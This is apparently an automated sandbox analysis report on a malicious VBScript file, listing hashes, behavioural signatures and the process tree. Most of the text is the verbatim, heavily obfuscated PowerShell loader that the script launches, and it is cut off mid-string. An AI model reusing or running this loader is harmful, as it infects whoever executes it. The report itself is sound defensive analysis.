bd61b1b3c793db66113ede342be139c73f9c058ee8eecf015eb684a207fcc645

General

Target

customer_2022-11-17_124747.vbs
Size

356KB
MD5

a3bdc3d07bef65e5e15894cbf7964242
SHA1

bf8aaaac2d7591923ef05c8faa6592c060082fdf
SHA256

bd61b1b3c793db66113ede342be139c73f9c058ee8eecf015eb684a207fcc645
SHA512

08b7792354020310b51fa19d6b961f02117d3591d9d8f5cb4d1f29a360709a93a1d60cfcb6118270fab3003a544b58593faaad5603a814d72da8c312968fdcc3
SSDEEP

6144:duMYlsoMP5X/BqDaAFB5p3Mur8/8MnNx8UUA/h8VaY0:QLsoe5X/BqeAF1tryx3gb0

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3976	powershell.exe
3976	powershell.exe
4204	powershell.exe
4204	powershell.exe
3024	powershell.exe
3024	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	4204	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3996 wrote to memory of 3976	3996	WScript.exe	80
PID 3996 wrote to memory of 3976	3996	WScript.exe	80
PID 3976 wrote to memory of 4204	3976	powershell.exe	82
PID 3976 wrote to memory of 4204	3976	powershell.exe	82
PID 3976 wrote to memory of 4204	3976	powershell.exe	82
PID 4204 wrote to memory of 3024	4204	powershell.exe	86
PID 4204 wrote to memory of 3024	4204	powershell.exe	86
PID 4204 wrote to memory of 3024	4204	powershell.exe	86

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\customer_2022-11-17_124747.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Exorganic = """AfFDauwinSucHutFeiFioUnnIn KdHPeTRaBTr Un{Ci Ov Te Si SipOpaCarEmaInmDa(Mo[BoSUltperAniNonElgAn]Br`$uaHSnSRe)Sh;Te Mi Pr gi Gr`$BeBHeyOvtineHesNo Fo=Ch UnNSyeUnwNe-FlODobrejJoeFlcqutUn fobJeyubtAnePl[St]St Pr(Re`$MeHUdSKh.IsLBaeBrnUdgsotMihRe Ca/en Un2In)Nd;Ba To Re Er JaFGaoLirDi(Be`$BaiTe=Op0Du;Bi Es`$KaiJe Os-BulSktIs Co`$FlHFoSak.OpLNaeSpnBlgKetUnhbl;Tu Ri`$SkiCo+Sp=fd2Ve)Is{At Fy De Sk Sn Te Ps wi va`$ReBBoyRetOueBrsDu[Ri`$ReiEn/Ch2Kl]Ur Sw=Ko Pa[RecBaoOvnCrvMyekirAltIn]Ro:Po:ShTbeoBrBPlyGrtRveSk(Bo`$GrHClSTy.AlSCouBubBesActInrTeiHjnSkgCa(Fr`$NoiJa,An Ov2En)Un,ex Hy1Af6Of)ry;Pa Fo St`$FeBmayOptRkeansUn[Ga`$KaiSk/An2Rg]We Un=Lu Ek(In`$SwBGiyHatAseGesPr[Re`$JuiHa/Bd2To]Po Sn-BrbBrxreoForNa Op9ut6Ki)Ub;Pl No Pl Ko Fi}Ud Sa[LnSDetElrLyiRenSugRe]Co[RaSJeyTisLntReeMamNo.ChTDoeByxSktRa.CrEPrnRycAdoAldToiCanIngVi]Dr:Gr:RoAErSbeCKuIRuICh.PhGSueAftSaSkvtSirUdiKlnDegNo(un`$OvbReyUntPleCosIf)Al;Fo}In`$NoFUneKyjEnlUfkraoSpnErtmyrOpoOplMilUleSkrRo0Ov=LeHArTSvBNi ki'by3Pr3Ko1Re9No1He3Sk1Sv4ca0Qu5Ka0UlDUd4ArESk0Ch4El0VeCTy0CaCAf'ft;Za`$WaFBueSijVelQuktroPanLetTarPooCalCalUteDorOp1th=DkHGaTOvBSh ud'Id2KoDSe0Un9Sq0Op3gu1Ns2Fl0SpFBe1Pr3Vi0KaFPa0Un6va1So4Ma4BeERo3Pa7Br0Un9Tr0DeEAb5Li3En5In2Hi4MiERa3Ap5Fi0YaEIm1St3Fa0Bi1Or0Va6Be0Di5Wh2ScEAd0Re1Ge1Ns4No0Bo9br1Ar6Ti0Sp5Ra2TaDUn0Co5Re1Kl4Pl0To8An0GrFGn0Ps4Fa1Ka3Sa'Sk;Cu`$SpFVaeBejRelDakPaoNonintSkrTaoFylHelFaeKorOv2Do=RoHSnTTrBar Ko'Rl2Ma7Se0Do5Ba1An4Se3pr0Se1Ka2As0TuFFe0Na3Ov2Mo1En0Tr4so0Br4Br1Ca2Di0Ho5ud1pi3Pl1Ti3Sk'As;Ti`$ChFNieInjPrlFlkgrophnBotSkrFeoFrlPalMieMarBe3Sn=MaHNaTKoBEc Pi'Fu3Pr3Fe1Op9Fy1Ra3Pl1Un4Pi0Br5Th0seDVi4TuEFr3Ad2Gt1Sy5te0InELy1ab4Se0Di9St0NeDRe0Ud5An4ObELs2Ar9Kr0UdECa1de4Ba0Xe5li1Fr2wo0KoFCy1Du0Va3Xa3Al0Sp5Ch1Bl2Ya1Od6Pi0Bl9Ci0Kl3Ul0Lf5Ci1Ac3Oc4FlERe2un8Ve0fo1Ep0PhEDi0Ty4Na0epCUn0Ag5St3Fo2fo0Ka5Me0Om6Fl'Po;Ak`$SoFLsepajPrlNekFaoBenHitMorGroFelMalUneBerPi4Tr=taHToTScBUn Ep'Fl1Aa3En1Su4Sc1Ha2Ur0Re9Ch0UnEuf0Re7Ba'Na;Af`$DiFNieSpjMalKokStolenDatJorDioWalYelHoeVerMe5Lb=KaHCrTKoBBo Ba'Qu2Sv7Ca0Po5Kr1Au4Ne2OvDSy0KaFHa0Fe4Pr1Zu5Fl0DoCMe0Ma5Ta2Dy8St0Ca1Au0HiEGa0Ar4Va0BeCpi0Ph5De'Un;Si`$OvFOreCajFolfakKnoDenArtBarHeoLilRelBreAmrJo6Rd=GrHCoTCoBGa Er'St3Vo2Un3Sc4He3Ou3Ma1Hy0Ox0En5Tu0af3ti0Un9Ka0Li1sa0AuCUn2FoENy0Gl1De0DeDMe0Ty5Mi4InCPa4Co0st2Zy8Si0Sv9Ex0Co4Tu0St5So2Th2Me1De9Ju3Ay3Ud0In9Pr0Ri7Fr4BaCTe4Dr0St3Dr0Ce1St5Gr0Tw2Br0UtCPu0Ca9Ch0Tm3Pr'Ri;Ma`$GyFMieMejFylNekMaoAcnTrtForLioAflSplSleCyrIm7Ul=ViHunTdiBGe Ca'Ge3Re2Bn1Qu5Un0FaEMi1Sk4un0Un9Fo0UvDKr0St5La4NuCFo4gp0In2koDma0Tr1De0quEKa0Ka1Te0Ku7Si0No5Be0Op4Bo'Va;kr`$StFDeeInjJulbekLaoScnEjtPrrFuoQulTelSueGarBl8af=AnHLiTEnBKo Sg'Tr3Up2si0Br5Be0an6cl0MaCGe0Se5Su0La3Pe1Co4Ho0Fj5Ta0Br4Br2Ce4Ve0ko5Gn0MoCGa0Th5at0Su7Pr0Ju1Br1Hl4Fa0Kb5To'Un;Re`$PoFCueKrjLilKakBeoFenDetAirCeoInlSulSeeLarUn9Sh=DrHStTGaBAy Qu'Ex2Rr9Ka0AvEMa2CoDNa0Hi5fo0feDFk0UnFAf1Ra2St1gi9Re2EnDKo0gnFSl0Pu4Ch1Th5ke0GaCVi0Ru5Sn'Au;Tr`$YadUdeTrmGioFegprrSyaHopWehGeiKocPaaOvlUrlGoyDe0Ov=FoHYaTBiBDe Sp'Bd2OfDEl1Sp9Bu2Wa4Pa0Fa5Be0InCMn0Ki5Lo0Je7Ta0in1Su1Bl4Pr0Be5Fi3Br4Aw1Ex9Le1Ti0bi0Ju5Mi'Gi;Ns`$RadUvePlmUnoAvgexrJiaDapHehUmiTrcBlaFrlNolreyVi1Fl=BeHNuTUnBVi Sl'Ls2Ne3Gr0efCAn0Bo1Tr1Hu3Pr1Ov3ga4FoCTo4Li0Oc3Ba0Te1Ri5Ro0Re2Ud0CiCFo0Be9Th0Di3Be4SkCIo4Ch0Fj3Ch3Mu0Ex5Bl0Ca1Th0EnCSk0Ho5St0Re4La4CaCCo4Tr0Sp2Ov1Ud0FoECo1Co3Sh0fi9Be2Sv3So0MiCde0St1Le1Im3Vi1Sl3As4ChCAp4Th0Fa2Ud1Fl1Da5Ce1En4Do0WiFFo2Ga3Ka0ReCDa0An1Fr1Mn3Na1Na3Ch'Do;Lu`$TsdDreOpmTroTrgWarFlaFapTohFriOecHeaTilRolBuyHy2no=MoHNoTGiBTu Tr'Ls2le9Ex0EnEKl1Gu6Ba0AfFMo0WiBwe0Ga5Ni'Fi;ra`$LndUdeBlmChoOxgParLnaHapWihFliDecTvaAmlHelDyyFd3Gu=AgHSuTViBVe Wh'Bo3Sc0Pr1Dr5Sa0Su2Fi0leCBa0Ti9Ro0Po3Pr4BrCai4Ju0Sk2In8Cl0Ab9Fa0Ul4Kr0Sk5Sa2Sa2Di1Di9At3tu3Fa0Le9Te0Tr7Tr4CeCBl4Ti0un2MeECo0Fe5ph1Ud7Gr3St3Sp0SuCPe0AfFSk1Si4Fj4idCNe4Pr0Ti3Sh6Hi0Sp9Fo1Un2Ac1Ud4Af1Su5Ko0Ge1Di0ViCMi'Pa;Co`$AudbreUdmFroDogSprByaAnpRahOviRecNaaSplFllGyyRa4Ha=RaHUnTSkBFl Br'Ov3Sp6Je0Sk9Pa1to2In1Cl4Au1Sk5Lg0Wo1Zo0EsCUg2Li1Sh0LvCPl0PoCOv0EjFIn0Bu3Ru'Kl;Ce`$WodBaespmitoPogCorBeaTipNohRoiKacOvaHalOulCeyAn5fi=AlHHoTAlBTe tu'St0HaEEl1Nu4Pe0Do4Kl0euCWo0InCNo'an;Mo`$CodReeUdmTaoDigCirDiaPepsthFliLucSkaRelRalBlyAl6Pe=AmHPyTFeBPi In'Di2DvEma1Ha4Po3St0Fa1Ev2Ov0WaFHe1gl4Co0He5Fr0Be3Tu1Ta4Di3Ae6Ta0Di9Ca1Co2Ak1Cu4Th1St5Ep0la1Sk0HaCFo2FrDVe0Re5No0SiDPr0obFBa1Ri2Pr1Ny9Fr'Ef;Se`$padtoeHymPaoswgElrpeaBlpUdhKriArcAgaPalBilTuyEm7Nu=ReHNoTBrBFr An'Re2Ce9Br2Pi5To3ba8Pr'Ap;Sl`$EldSteUnmHeoWhgFerHeaGapLihUniCocMiaErlChlouyAu8Pa=OuHCaTDyBSa Ta'po3BeCFu'Ma;ChSCheDotBe-KaANolTeiGraUnsRe Re-UnnDraWimCoead trdMoeLimMooPugChrOpaEfpFahPoiMacReaDolFolKayPa9re Py-AfvUnaImlUnuDyeCa Ba`$BodHaeSomAmolegUtrmaaKlpAahStiDrcDaaCalPelGlyFo7Co;kofDruMinTocNutReiReoNanSv ThfSykPopPo In{kuPspaBirScaNomAb sh(Fl`$UnvMi_RemGe,Te Vi`$AmvFr_PrpRd)Ga Un Pi Ts Or Pr;Fo`$SyATmpLcrPreAfyInnChtAneAn0St Su=unHByTOpBdo Vo'Me4Co4Ab1By6Do1Pa5Mi0BoEPe0GoDBa4Co0Ba5paDSy4ag0Wa4Sa8Si3UnBLa2Bu1Fi1Kl0An1Do0Su2Im4Ud0SeFRa0stDUp0Sa1Du0Ud9Do0coECe3HuDSu5NoAKo5koASh2Ic3Ty1Fo5un1Af2Ui1bi2Gl0Pr5Ra0ArEDa1Fr4Sk2Tu4ko0SiFNa0FrDJu0Ui1Ga0Ni9Vi0PoENa4VaEbe2Sk7Do0Ki5Bi1Ac4Cl2Gh1Pl1ch3Ra1Ta3Lo0Pi5Ba0BoDYe0Op2Me0BeCIm0Su9Ho0Li5Le1Un3br4In8Ka4Bu9Ov4Je0Al1SuCPy4Se0Fa3Ar7Sk0Lu8Re0Re5Do1Ra2Pt0Br5Ad4IlDKr2skFMa0Ut2Ch0TeAPi0Ut5pu0Se3Af1Fa4At4Et0Gl1spBAf4Ci0La4Sv4Fo3ViFSp4HoEch2Il7En0knCAr0PeFSm0Un2de0Ad1By0DeCHe2Un1Ta1Vi3Si1Gl3Co0Ho5Be0FiDBr0Sh2Mo0LaCBe1Bi9Ut2He3pr0Gr1Ph0Sa3Pa0Dr8ov0Wa5Re4Pa0Mo4RaDun2Gr1Ge0EnEEs0Pr4lo4Ba0Kl4Sl4Ac3SkFSp4SyEAn2kaCSk0TaFRe0Op3Ca0La1La1Pr4Ps0Up9Ta0ThFIn0PrEde4CaEBu3Fa3Ra1Pr0Il0FeCZy0Sa9Or1am4Be4He8Ag4Ba4Jo0Ac4ty0Un5Yd0WaDbr0MeFSl0Im7Fi1St2Ku0Ki1An1Sa0En0Aa8Vr0De9Ve0La3De0Sa1Pl0ViCSt0SeCUn1Ro9ti5Ja8Bi4Fr9Lo3GaBRe4InDBv5Sv1St3CoDPr4BoEUn2Sp5Ko1So1Ly1Ka5Co0Li1Ti0SoCSk1ta3Ks4In8Cr4Sp4Pl2Ts6Ta0Un5Ma0LiADa0kuCDa0SoBKe0BrFJe0FlEIn1Sk4Ki1An2Mi0ToFpe0DyCEl0TvCDe0Ti5Ha1Yu2Sp5Su0Ma4bu9Sp4Ob0Tw1UdDGa4Kn9Se4JoEIl2Re7va0Ro5Un1ud4Un3Sp4Re1fi9Is1Hi0Ti0Ca5Fo4Be8El4Ur4Up2He6Ru0sn5Au0heAKa0DiCPa0waBIs0BeFco0BrEpi1Wh4St1Un2Re0ClFBe0KaCAl0UnCHe0Ad5Fo1Qu2Ki5Re1Je4Un9Yu'Ov;TrdRoeScmStoRugfarUnaTupLahReiThcMiaPalBrlEryRe9gu St`$BaAOupQurbieSayTinVitFaeTa0Ja;Sp`$TiACrpMirflebryTanBrtSteTi5Wr Pl=Dy TaHPtTCaBHa La'Ap4Ge4re1Do6Se0Fr1Th1Ag2St3NaFPs0Te7Pr1Du0Ga0Le1to4Du0Co5LoDSp4Di0Sa4Go4Ok1Fi6Ad1Br5Up0BeEEp0BiDTa4UnEEp2Su7An0Le5Ni1In4Un2BiDMi0Fu5In1Ch4pl0Se8As0OpFRe0La4Bi4Se8Re4Ta4Co2Is6Zi0Un5Ln0StAEs0SuCFr0byBLi0OlFTh0KuEBe1Th4Ma1Fy2Fl0OoFTr0ThCCa0OvCAm0Ol5Sa1Ba2Ha5he2Fa4GsCSl4ph0By3MeBDo3Sa4ml1Sl9Ly1Li0Te0Bj5Au3hyBMi3SkDIn3LiDFo4Wi0Pa2Su0Ma4ka8fa4va4Wa2Ba6Si0Me5Ou0stAud0fiCTr0ViBOp0CaFBi0DaEGr1Cl4Ka1Va2Sc0PiFHa0EnCSy0poCRe0Sc5Ap1Tu2Bo5Ov3Mo4FoCDa4Ne0Pr4Te4di2Pu6Je0Am5Ug0TaAUn0HyCta0AnBYe0CiFbr0DeEAu1Sa4St1Ha2Cr0BoFLi0BlCTr0PaCbu0De5Te1nu2Ud5Pr4Ta4Un9Sa4Ka9Fo're;StdLiePrmSuoRigPardraPrpFehUniOucAgaLelBelGlyFj9Es Mo`$erABvpSkrCrePeyInnSotUdeSt5Ha;Re`$IsAArpOprdaehvyTenDotPeeRe1sa Pr=Co SmHSvTSuBDr Vi'Ar1Tv2St0Re5Ry1Wh4Ap1sw5Sk1Au2Ha0CaECo4le0Ge4To4Ka1bl6Sp0Dr1sk1Kl2Di3StFDa0Du7Go1Kl0Me0Va1Ar4InEOm2Sk9Fr0MoEPr1ar6tv0InFSo0CaBTi0Ta5Pa4Ob8Mu4Pa4Pa0noEIn1La5Pe0SiCIn0PyCTr4EjCPr4Ta0Fl2se0Mu4In8Ti3AfBHa3ja3Ud1Br9Se1Ti3Aq1Vo4En0Ar5Bo0CoDBi4vrEMi3Hi2He1An5de0SpEHa1Ch4hy0He9Ho0GaDKn0Ju5Gr4prEKa2Be9Mu0LeEUn1Re4Ra0Ba5Al1Go2On0JoFAs1sl0Ma3Do3St0Ha5Op1Vo2Ka1Af6fo0Be9Cn0Ha3Pa0Ro5Eu1Af3Ha4NoEAr2Di8Su0In1Hi0TwERe0An4Pa0DaCMi0Sp5Re3ep2Re0pr5Au0Co6Bo3FoDGn4Se8Ba2ReEBr0Sk5In1co7Ba4UdDCa2ReFAc0Cr2An0StACl0Re5Sm0Mo3ln1Ru4La4Su0Ju3Da3Tr1ou9De1Kl3Ye1Fe4Pr0Un5St0ZiDOp4GrEMi3Co2Ss1fr5Gr0LiEKr1Ef4Fr0Th9do0DrDUd0So5Sa4ChEOc2Lo9Tu0ZyEFa1Pa4Hi0Li5Af1Br2Kl0auFTj1Ma0Op3Hy3Si0Un5Bu1fe2Wa1Ay6Vg0Cy9Bu0Be3As0ti5Ba1Up3Ru4CaEBy2Kr8Do0So1De0BrEOm0De4Ka0UdCLa0Sp5Gu3Wi2si0Ba5Qu0Sr6Mu4Ga8Fo4Ri8Lo2WoEma0Af5Fl1Fl7Ge4UnDAc2BoFFa0My2ed0AnABr0Kr5An0vo3Ev1Sa4Si4Do0pa2Fi9Ch0TaEOp1Be4Hy3Be0Un1Re4Va1Ta2Ta4Br9Sa4gsCMo4An0St4No8ge4Ty4St1Ef6Of1De5Fi0coEBr0UnDDi4SoEMo2Hj7Di0th5st1Gi4Tr2TeDAe0Re5Ph1Un4Ag0Ho8Pt0BlFGe0Ge4Ba4Ov8ti4Di4zo2Un6Ap0Su5Ma0ChANo0VkCba0haBCa0ntFKr0PlESk1Ma4Si1Su2Rh0BoFTu0AmCAn0LoCSp0To5Ma1Ga2Lu5Sa5lu4Dy9Be4ov9Is4caEvi2St9Re0ReEKv1ud6Se0AlFco0AfBAk0Fo5Dm4Fl8Fe4La4Su0LiETh1ud5al0IlCga0HaCBj4ReCBa4Ko0In2pr0Un4Fl8Ru4Pa4Pe1Ve6Va3SpFBi0UiDUl4Pu9Be4Ba9Ep4Sc9Af4Gr9Mi4stCFu4Sa0On4Lu4Sk1Re6Nv3GrFKa1Ud0Ma4Co9ho4De9Sa'Ha;UpdsneRemGaoHygSyrTeaTopBiheriPrcBaaKrlSylYoyPl9bl Ov`$AmACipforDieUoyFenFrtWeeHy1Pu;Kl}BofdiuBinMacHjtAriinoHonNy BoGUnDQuTUr Re{SkPlyaRirStafymBr Pr(If[PaPHyaGirAfaRhmFreGrtReeAnrUn(QuPSyoNosFoiKltMaiBeoOnnFu En=St Br0Na,An FaMSaaSqnVadScaNotEnoderTeyHi Ud=No Sk`$AsTLaraluTieSm)Ta]Un Fo[KnTOvyOvpCleBl[Lu]bu]Uh Fo`$ApvFoaHarFr_HapBraEnrbeaYamMiePstDreSkrlesSt,Ne[DoPEnaEtrStaBamOeeNntLeeSerAl(AbPLaoBesFeiEjtDeiSpoAnnun Fr=Am Be1Pe)En]Si Sk[GrTPsyDrpAveAn]Ma Ba`$FivBerUntVi Re=Fu Ge[CeVBooMaiKldTe]Re)Se;Ta`$NiARepGurReeMiyAunNatFieBa2sl Hi=Af FrHBlTAfBKr Rh'Tr4Ho4Pr3Ro6Um3in4kr2Oe2An4Ch0Am5UnDCl4El0Tr3SeBHy2Jo1Me1By0Of1re0Sk2Sk4Ko0AbFOr0MaDAr0Ag1Un0Pi9Pr0FoESe3InDOx5PiAAn5StASi2re3Su1No5Pr1Fo2Un1At2Ga0Ta5Or0ElEPi1Du4Sy2Mu4In0SuFFl0GeDve0Pr1es0Pr9Li0StEAr4DeEAn2Ba4Re0ga5Sl0Ho6cr0Lo9Lu0OrEPl0De5Bu2Ch4Dr1Ra9Pr0OrERa0Be1Co0SaDDy0De9Ls0un3Ko2Pl1fe1No3Id1Lu3Me0Ka5He0VaDSk0Sk2An0HoCRi1Te9Pa4Un8Pe4Ma8li2noEPh0fo5Po1Ud7in4PoDSe2AvFEd0Da2Du0TiAFl0Al5Ar0Hj3Br1Ro4Un4Un0Na3Bl3He1Fu9Fr1Ti3Me1Tr4Hy0Re5Sl0RkDMe4BlEAc3Sp2Ph0Si5Su0Se6Pl0ElChe0la5De0fl3Or1Ga4Af0Gi9gl0KjFre0TiEHu4UnEAw2Re1So1Tr3Ko1Su3Cy0Pl5Fo0InDId0Ek2Be0CiCPe1Va9sp2TaEFo0In1Le0RiDVe0De5In4Sp8ud4ma4Rh2Un6Ba0In5Da0DaAOx0BeCau0TiBCa0WaFSa0ReEun1In4Ca1Ca2Kr0OsFDr0PlCKa0OrCPo0St5Re1Op2Im5Ch8Tv4Fo9Av4Se9Pi4gaCKa4My0Ug3CaBbr3he3Ba1Hj9Ps1La3ne1Bl4Di0Rr5Un0reDUn4MeETy3Si2Dk0Sh5Ps0Br6Ge0UdCDe0Tr5St0Mi3Sv1Fa4sp0Ce9Un0FaFNo0SeEUn4ReEDe2La5Rn0StDKn0Ex9Co1St4Oc4HoERe2Hy1Na1Sw3Wh1Un3be0Ps5Sd0UnDMa0Ap2St0CeCse1Us9Co2Tr2Ak1Fi5Od0St9Sp0BeCBa0Os4Fo0Se5Un1Om2Be2Pr1Co0Mu3Li0Ba3La0du5Er1Fd3Ag1ri3Ka3ChDAu5TeAFr5MiASt3sp2Fo1Cu5Re0DeERa4By9Pr4SlEIn2Ne4Op0St5vi0Pr6Am0Pl9Tr0BaEIn0Su5Fi2Un4Pr1Pr9Ac0ReEAf0Ma1An0SlDbe0Fo9St0Zi3Be2RiDRe0NoFsk0Co4ei1Om5Me0mcCKe0De5Bu4Le8Fe4Jo4He2un6ex0Ud5Du0OuACo0UdCGr0chBDo0UvFAn0SmERe1He4Su1Di2Ro0KoFVo0SuCDa0TvCvi0Tr5Of1Wi2Ep5Ga9Sp4HjCSa4aa0st4Sk4Ba0Ju6fl0Ko1Co0StCAn1St3Se0De5Fe4St9Ca4UnEFo2Ab4Sj0Ak5Co0Re6Sa0Pa9Ho0LyEAr0re5Be3Be4An1Hy9Ou1St0Ob0cy5Re4Sy8Ti4vi4St0Be4Un0cl5Sl0IsDCa0SpFMu0Ge7Em1sp2My0Fl1Al1Ph0St0Ku8So0Re9Ge0Ef3Re0Sk1Me0UhCBo0MoCSq1In9El5No0Ke4EtCMe4Or0bo4Us4Pa0Un4ma0Na5Fa0TrDPr0WhFQu0Se7Sl1Sa2An0Af1Cu1ru0La0af8Sk0Ad9La0Sn3No0hu1en0AcCZe0VaCTy1Mi9Se5Be1Wi4PeCCh4Ol0Re3PaBTe3Sk3Gl1Do9Kr1Be3Af1Be4Mo0Fe5No0RhDGy4GlESe2TrDLe1Ab5fe0SpCRo1Ov4Ru0Mo9Co0Tr3St0Mi1Sa1Id3Ba1Su4Ad2Ge4Co0Sk5Kr0beCIn0Vi5Le0Be7Pr0fd1Ny1Bo4Fa0Mi5Ac3InDAl4Sp9Si'Ha;AldTueGamEnoSqgPirPraKepTrhRuiGrcWaaEplBolpayUm9Fl Fe`$SqAAnpSkrUfeLeyzinPrtDreAp2Af;Eu`$SaAHypGerLaePrySvnSttLieIn3Ti So=In CrHFiTDuBMi Un'Ri4Ha4Ar3Un6At3St4Je2De2ov4itEHo2Ew4pa0Ex5Fo0Fo6Be0Di9Ho0BiESt0Ga5Se2ta3Mo0DiFHy0ViEIm1Ju3Sc1Ge4Te1Gr2Ma1He5Va0Sa3Af1Un4Di0UdFTv1Au2Sp4af8Va4Ud4Pe2Va6Bl0Ky5ha0ReAAf0EfCOp0DrBko0StFSp0PjETa1Re4Pa1Br2Mu0SeFLa0CoCAp0ToCRe0Un5Ly1Su2Gr5Fa6Op4ExCTr4Tv0Sa3OrBTp3Sn3Li1Ca9Sa1Mo3Un1Ro4af0Sa5Pr0InDDi4FeEel3un2Se0Re5Re0an6Be0AnCWo0Kb5An0Mi3Sp1Un4Be0Af9Ap0KlFEm0ToESi4PrEUn2st3Co0no1No0PrCmu0JaCha0Mu9Sa0CoEPr0Tr7Be2Sw3Fo0StFJe0BiEAf1Jo6Ar0Fu5co0BuEBe1Ge4Tr0be9Ka0SuFBe0saEHu1Wo3Sk3BiDOp5reANo5BrAHa3Ha3Se1Un4Br0Sy1Pr0ToENi0de4Be0Th1Qu1Sn2En0Vo4Je4TtCDa4Wi0ap4Wr4Ki1Ru6Or0Re1An1Pr2Ce3FeFHy1me0Sl0Sc1St1Ta2Ja0Al1sa0DiDBg0Ta5Os1Fi4Ju0Li5Ye1sy2Ry1Il3Un4Fi9Ap4GeEAi3Sc3Ja0Ho5Md1Di4Bi2We9Or0IsDIn1Sk0Sa0seCMo0Ni5Mo0KaDLe0Fe5Pr0NeETo1Te4Ko0Su1pu1Su4Sn0Sp9Un0PuFMa0niECo2El6Ci0GrCar0Fr1Fr0fo7En1Na3Fi4Co8Ha4Dr4Ce2ca6Sr0mi5Pa0CiAPe0QuCTv0BeBHa0DeFKl0ToEEs1De4Im1Ge2Sm0CiFce0EnCge0InCPr0In5My1Pa2Do5Sk7Sk4El9Me'Ch;HedDeeTomTroexgRtrTeaPypLuhCoidicInaBulFolanyNo9Ps Br`$HaADepCyrKaeMiyFonTatPreKi3Ca;Ve`$DeAIlpImrboeTaySunImtPaePr4Ka Pr=Sk SsHRaTFoBFl Al'Un4in4Ro3Se6Ri3Ub4An2Sk2Be4PrEsc2Fe4Me0Co5Pu0Pr6Pl0Lo9Be0NaEMi0Pl5Ak2coDCo0Sh5No1tr4al0Da8Na0NaFBe0Ha4fa4No8Fo4Je4Ra0Ra4Pr0Un5As0AlDCr0RiFEk0Ol7Co1Pr2ha0Pe1Hm1Sk0Re0La8Pa0Un9Di0Sk3Ba0Hu1Ol0SkCPe0TaCHv1Ky9Ma5Va2La4DiCPr4Ak0Im4lp4Te0hd4In0La5Fi0ReDPo0PeFIn0fr7Om1At2In0Se1Ep1in0In0Af8Ba0Ko9Hy0In3Mu0Di1Sm0noCBa0OmCEk1Hu9Do5Co3Es4LoCOv4In0mi4So4Ef1Ud6Wh1Op2Ok1Ou4Sp4opCDu4Cz0Fl4Ak4Am1Se6Be0Ri1Fe1Ai2Vi3ThFBo1Dk0Go0Sp1Bi1Et2Su0Ch1Ca0UnDSt0tt5Dy1Sa4Am0Ch5Go1Vi2Ma1Ya3In4No9Ge4teETv3Ru3Sv0Im5Sa1Si4ba2De9Tr0AnDSu1Ko0Am0SgCPa0Ud5Dr0SlDOp0Ba5Te0TiESe1Fo4No0Sa1Mo1Me4Pe0Li9Fo0joFLa0AuEsl2Oo6dr0PaCPr0Im1Be0Ka7Sp1Le3St4Ra8Ga4Sa4Pr2ho6Fr0ne5Ze0CaADi0UnCTh0ScBCo0SuFQu0KiESa1Sp4Rh1Ba2Kr0PaFFi0quCMi0KrCSk0Pr5Sh1ex2Wi5fr7Eg4De9Om'Co;RadEgelomSeoHagInrLaaLapTyhDoiAucHkaNalDelWeyHu9Af Kr`$HeAMapParReeAeyTrnAntKoeHy4Ac;ko`$EtARepGlrApeFlyAfnGotPoeBu5De Sk=En KlHBrTVaBNa Fa'ti1To2Ca0Pr5Pt1Il4Sa1Ae5Re1Nr2Va0brEKv4Be0Am4Pl4Ne3In6Ja3Im4No2Vi2ko4StEEl2At3Ba1Al2Sk0re5Gu0Mo1Ot1Mi4Me0Cr5Rh3Vb4gr1Br9Fr1Ly0Cr0Sl5Sl4Eg8Sw4Pr9sp'Fo;ChdReeSkmQuoFigPerSnaUnpPahOpiMocReaMelTolSoyKu9Sk Ud`$RaAAfpPerAfeChyUnnPrtWeeBo5Sk Ba En Ei;Un}se`$AfkElkIn cy=Ko ZiHSkTbjBAr Om'Th0SoBAf0La5St1Bl2Tu0DeESe0Kr5Op0PlCHe5Va3Ab5Ar2He'Br;Fl`$brAKvpBerCoeReyConAntPreCh6st No=Od MiHxyTNoBBo Ko'Ge4ef4da1At6Re0ou1re1Om2Le3FiFDo1Re6Se0So1Mi4Ud0Em5PaDPr4Af0Ro3GyBKl3Fo3Fu1To9Mu1Aa3Ch1Be4Du0Sa5El0CaDLi4CaEOb3sk2Fr1Ov5Ra0LaETe1sn4Va0Er9Ve0StDSc0Lo5Te4CoEKi2Br9ko0vaEDa1Re4Mi0Ud5Fa1Em2Af0keFer1Dv0Li3Fe3To0Je5Be1Sy2St1Gr6Al0Ti9sp0Gr3Fo0Ce5Va1Bi3Mu4PaERe2FoDVa0Di1ha1Kn2Ur1Fo3Ra0No8Af0Fi1Bi0AmCMt3KlDun5LoAKo5GoASu2He7py0Br5Di1Ch4Re2Bu4Pr0Ok5Ro0GrCCh0Fo5Bo0Je7fe0In1Vi1Ob4dk0Sp5Un2Co6Fu0FdFjo1Ch2Ds2Sa6Th1Pe5Di0AfEPe0Th3En1Sd4En0Tr9Re0UnFni0GaEJo3Ud0Ok0OvFSn0Ep9Co0MyEPe1Al4Sp0Ar5No1di2Ex4Fr8Sp4ma8Br0Bl6Li0FrBEm1Ud0Ci4Hy0pu4Sk4Bo0SkBMl0PuBBi4Ju0Ta4Hy4Dj0Pe4Go0Un5No0JoDVo0CoFPr0Tr7Bu1Ad2He0Dy1Fu1As0Bo0Ne8Op0Ja9Ka0Co3Ca0ao1St0unCWo0NeCMe1Ar9He5Ba4No4Fo9Co4LaCMr4Al0Ch4Ag8Cy2De7Hu2un4Ad3Li4Af4Pr0Ka2Mi0Tj4Go8To3DrBsh2St9Tg0AfESp1Bu4Ba3Ho0An1Ud4no1Fe2Sa3MiDGe4EpCSl4Ov0Zi3SeBNo3Fa5os2Ko9Mo0MeEFa1Ve4Ti5Al3be5My2Be3OpDOp4M